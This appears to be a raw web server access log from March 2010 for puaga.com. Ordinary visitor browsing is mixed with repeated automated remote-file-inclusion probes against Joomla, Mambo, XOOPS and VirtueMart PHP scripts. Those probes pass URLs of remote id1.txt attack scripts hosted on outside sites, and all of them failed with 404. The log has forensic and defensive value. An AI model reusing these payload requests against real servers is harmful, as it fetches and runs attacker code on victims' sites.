118.129.170.49 - - [07/Mar/2010:07:21:07 -0800] "GET /logs/access_100217.log%20%20/errors.php?error=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [07/Mar/2010:07:21:07 -0800] "GET /logs/errors.php?error=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [07/Mar/2010:07:21:10 -0800] "GET /errors.php?error=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [07/Mar/2010:07:21:24 -0800] "GET /logs/access_100203.log%20%20/errors.php?error=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.154 - - [07/Mar/2010:07:21:44 -0800] "GET /logs/access_100218.log%20%20//bbs//////////good.php?board_skin_path=http://facebook30.700megs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.203.180.144 - - [07/Mar/2010:07:24:09 -0800] "GET /logs/access_100218.log/-DSSL? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
77.241.83.107 - - [07/Mar/2010:07:24:25 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://wellkome.ru/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
77.241.83.107 - - [07/Mar/2010:07:24:25 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://wellkome.ru/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
77.241.83.107 - - [07/Mar/2010:07:24:30 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://wellkome.ru/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:07:26:26 -0800] "GET /errors.php?error=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:07:26:29 -0800] "GET /logs/errors.php?error=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.112.181 - - [07/Mar/2010:07:26:29 -0800] "GET /pnetsite/releases/PreviewRelease2.sit HTTP/1.0" 200 955056 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "pixero.net"
200.93.147.154 - - [07/Mar/2010:07:26:30 -0800] "GET /logs/access_100129.log/errors.php?error=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.203.180.144 - - [07/Mar/2010:07:26:31 -0800] "GET /logs/access_100129.log/-DSSL? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
211.203.180.144 - - [07/Mar/2010:07:26:32 -0800] "GET /-DSSL? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
211.203.180.144 - - [07/Mar/2010:07:26:32 -0800] "GET /logs/-DSSL? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:28:23 -0800] "GET / HTTP/1.1" 200 3642 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:29:52 -0800] "GET /diger/ HTTP/1.1" 200 3545 "http://www.puaga.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:29:53 -0800] "GET /diger HTTP/1.1" 301 90 "http://www.puaga.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:29:57 -0800] "GET /style/pngHack.css HTTP/1.1" 200 42 "http://www.puaga.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:30:00 -0800] "GET /style/5.style.css HTTP/1.1" 200 2407 "http://www.puaga.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
222.239.227.209 - - [07/Mar/2010:07:30:49 -0800] "GET /logs/access_100227.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:31:11 -0800] "GET /cam/ HTTP/1.1" 200 749 "http://www.puaga.com/diger/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:31:14 -0800] "GET /pictures/ HTTP/1.1" 200 7813 "http://www.puaga.com/diger/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
211.203.180.144 - - [07/Mar/2010:07:31:31 -0800] "GET /logs/access_100220.log/-DSSL? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:07:31:34 -0800] "GET /logs/access_100206.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:07:31:35 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:07:31:35 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.36.232.169 - - [07/Mar/2010:07:32:10 -0800] "GET /logs///modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.prozesse-im-unternehmen.de/mac/components/com_joomlastats/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.36.232.169 - - [07/Mar/2010:07:32:10 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.prozesse-im-unternehmen.de/mac/components/com_joomlastats/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:32:37 -0800] "GET /pictures/p9/ HTTP/1.1" 302 10336 "http://www.puaga.com/pictures/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:32:38 -0800] "GET /pictures/p3 HTTP/1.1" 301 96 "http://www.puaga.com/pictures/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:32:41 -0800] "GET /polteaser/ HTTP/1.1" 200 1569 "http://www.puaga.com/pictures/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:32:42 -0800] "GET /pictures/p5/ HTTP/1.1" 302 9773 "http://www.puaga.com/pictures/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:32:43 -0800] "GET /pictures/p6 HTTP/1.1" 301 96 "http://www.puaga.com/pictures/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:32:44 -0800] "GET /style/PuagaDark.css HTTP/1.1" 200 2588 "http://www.puaga.com/pictures/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:32:45 -0800] "GET /pictures/p8 HTTP/1.1" 301 96 "http://www.puaga.com/pictures/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:32:47 -0800] "GET /login/register.php HTTP/1.1" 200 4989 "http://www.puaga.com/pictures/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:32:48 -0800] "GET /tour/ HTTP/1.1" 404 5258 "http://www.puaga.com/pictures/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:32:49 -0800] "GET /pictures/login HTTP/1.1" 404 5258 "http://www.puaga.com/pictures/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:32:50 -0800] "GET /pictures/p7 HTTP/1.1" 301 96 "http://www.puaga.com/pictures/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:32:51 -0800] "GET /pictures/p9 HTTP/1.1" 301 96 "http://www.puaga.com/pictures/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:32:52 -0800] "GET /ideal/ HTTP/1.1" 200 524 "http://www.puaga.com/pictures/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:32:53 -0800] "GET /pictures/p11 HTTP/1.1" 301 97 "http://www.puaga.com/pictures/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:32:53 -0800] "GET /blog/ HTTP/1.1" 404 5258 "http://www.puaga.com/pictures/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:32:54 -0800] "GET /new/ HTTP/1.1" 404 5258 "http://www.puaga.com/pictures/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:32:54 -0800] "GET /pictures/p8/ HTTP/1.1" 302 11319 "http://www.puaga.com/pictures/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:32:55 -0800] "GET /blog HTTP/1.1" 404 5258 "http://www.puaga.com/pictures/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:32:55 -0800] "GET /pictures/p5 HTTP/1.1" 301 96 "http://www.puaga.com/pictures/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:32:56 -0800] "GET /services/ HTTP/1.1" 404 5258 "http://www.puaga.com/pictures/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:32:56 -0800] "GET /pictures/p11/ HTTP/1.1" 302 34466 "http://www.puaga.com/pictures/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:32:57 -0800] "GET /pictures/p6/ HTTP/1.0" 302 7084 "http://www.puaga.com/pictures/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:32:57 -0800] "GET /labs/ HTTP/1.1" 404 5258 "http://www.puaga.com/pictures/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:32:58 -0800] "GET /pictures/p1/ HTTP/1.1" 302 4597 "http://www.puaga.com/pictures/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:32:58 -0800] "GET /pictures/p7/ HTTP/1.1" 302 7216 "http://www.puaga.com/pictures/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:07:33:39 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:07:33:39 -0800] "GET /logs/access_100206.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:07:33:40 -0800] "GET /logs/access_100206.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:07:33:40 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:07:33:40 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:07:33:44 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Mar/2010:07:33:48 -0800] "GET /logs/access_100206.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.36.232.169 - - [07/Mar/2010:07:33:49 -0800] "GET /logs/access_100211.log%20%20///modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.prozesse-im-unternehmen.de/mac/components/com_joomlastats/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:33:55 -0800] "GET /login/ HTTP/1.1" 200 6691 "http://www.puaga.com/login/register.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:33:55 -0800] "GET /themes/retro.css HTTP/1.1" 404 5258 "http://www.puaga.com/login/register.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:33:55 -0800] "GET /style/default_style.css HTTP/1.1" 200 1982 "http://www.puaga.com/login/register.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:33:56 -0800] "GET /mail/ HTTP/1.1" 404 5258 "http://www.puaga.com/login/register.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:33:56 -0800] "GET /login/needregister.php HTTP/1.1" 302 5 "http://www.puaga.com/pictures/p9/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:33:57 -0800] "GET /pictures/p9/dtree.css HTTP/1.1" 404 5258 "http://www.puaga.com/pictures/p9/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:33:57 -0800] "GET /index.php?r=1 HTTP/1.1" 200 3642 "http://www.puaga.com/polteaser/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:33:57 -0800] "GET /module/view.php?id=welcome HTTP/1.1" 200 4906 "http://www.puaga.com/login/register.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:33:57 -0800] "GET /pictures/p5/dtree.css HTTP/1.1" 404 5258 "http://www.puaga.com/pictures/p5/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:33:58 -0800] "GET /pictures/p7/dtree.css HTTP/1.1" 404 5258 "http://www.puaga.com/pictures/p7/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:33:59 -0800] "GET /pictures/p3/dtree.css HTTP/1.1" 404 5258 "http://www.puaga.com/pictures/p3/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:33:59 -0800] "GET /gelistiriciler/ HTTP/1.1" 200 7277 "http://www.puaga.com/tour/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:33:59 -0800] "GET /yazilim/ HTTP/1.1" 200 7193 "http://www.puaga.com/tour/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:33:59 -0800] "GET /style/polstandard.css HTTP/1.1" 200 5623 "http://www.puaga.com/tour/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:34:00 -0800] "GET /destek/ HTTP/1.1" 200 6970 "http://www.puaga.com/tour/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:34:00 -0800] "GET /pixero/ HTTP/1.1" 200 8156 "http://www.puaga.com/tour/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:34:00 -0800] "GET /pol/ HTTP/1.1" 200 11814 "http://www.puaga.com/tour/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:34:51 -0800] "GET /destek/showcategory.php?cat=1 HTTP/1.1" 200 8322 "http://www.puaga.com/destek/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:34:52 -0800] "GET /pixero/support.php HTTP/1.1" 302 5 "http://www.puaga.com/pixero/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:34:52 -0800] "GET /pixero/faq.php HTTP/1.1" 404 5258 "http://www.puaga.com/pixero/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:34:52 -0800] "GET /pixero/devices.php HTTP/1.1" 404 5258 "http://www.puaga.com/pixero/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
38.100.41.112 - - [07/Mar/2010:07:34:52 -0800] "GET /destek/kbshow.php?article=66069279423 HTTP/1.1" 200 6952 "http://www.puaga.com/destek/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:07:35:09 -0800] "GET /logs/access_100206.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:07:35:16 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:07:35:16 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [07/Mar/2010:07:36:31 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [07/Mar/2010:07:36:31 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [07/Mar/2010:07:36:31 -0800] "GET /logs/access_100208.log%20%20//modules/xfsection/modify.php?dir_module=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [07/Mar/2010:07:36:32 -0800] "GET /logs/access_100204.log%20%20//modules/xfsection/modify.php?dir_module=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [07/Mar/2010:07:36:44 -0800] "GET /logs/access_100204.log%20%20//modules/xfsection/modify.php?dir_module=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [07/Mar/2010:07:36:44 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [07/Mar/2010:07:36:44 -0800] "GET /logs/access_100208.log%20%20//modules/xfsection/modify.php?dir_module=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [07/Mar/2010:07:36:44 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:07:36:57 -0800] "GET /logs/access_100214.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:07:37:01 -0800] "GET /logs/access_100214.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [07/Mar/2010:07:37:45 -0800] "GET /logs/access_100209.log/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://wellkome.ru/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
77.241.83.107 - - [07/Mar/2010:07:37:46 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://wellkome.ru/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
77.241.83.107 - - [07/Mar/2010:07:37:46 -0800] "GET /logs/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://wellkome.ru/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
77.241.83.107 - - [07/Mar/2010:07:37:46 -0800] "GET /logs/access_100209.log/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://wellkome.ru/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
77.241.83.107 - - [07/Mar/2010:07:37:47 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://wellkome.ru/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
77.241.83.107 - - [07/Mar/2010:07:37:47 -0800] "GET /logs/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://wellkome.ru/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
77.241.83.107 - - [07/Mar/2010:07:37:47 -0800] "GET /logs/access_100209.log/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://wellkome.ru/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
77.241.83.107 - - [07/Mar/2010:07:37:48 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://wellkome.ru/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
77.241.83.107 - - [07/Mar/2010:07:37:48 -0800] "GET /logs/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://wellkome.ru/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:07:38:03 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:07:38:03 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:07:38:09 -0800] "GET /logs/access_100206.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:07:38:11 -0800] "GET /logs/access_100214.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:07:39:08 -0800] "GET /logs/view.php?dir=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:07:39:08 -0800] "GET /view.php?dir=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:07:39:08 -0800] "GET /logs/access_100213.log%20%20/view.php?dir=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.178.130 - - [07/Mar/2010:07:40:00 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.displaycom.co.kr/board/ins2tall/evy/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.178.130 - - [07/Mar/2010:07:40:00 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.displaycom.co.kr/board/ins2tall/evy/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.178.130 - - [07/Mar/2010:07:40:00 -0800] "GET /logs/access_100224.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.displaycom.co.kr/board/ins2tall/evy/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.178.130 - - [07/Mar/2010:07:40:19 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.displaycom.co.kr/board/ins2tall/evy/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.178.130 - - [07/Mar/2010:07:40:19 -0800] "GET /logs/access_100224.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.displaycom.co.kr/board/ins2tall/evy/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.178.130 - - [07/Mar/2010:07:40:19 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.displaycom.co.kr/board/ins2tall/evy/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
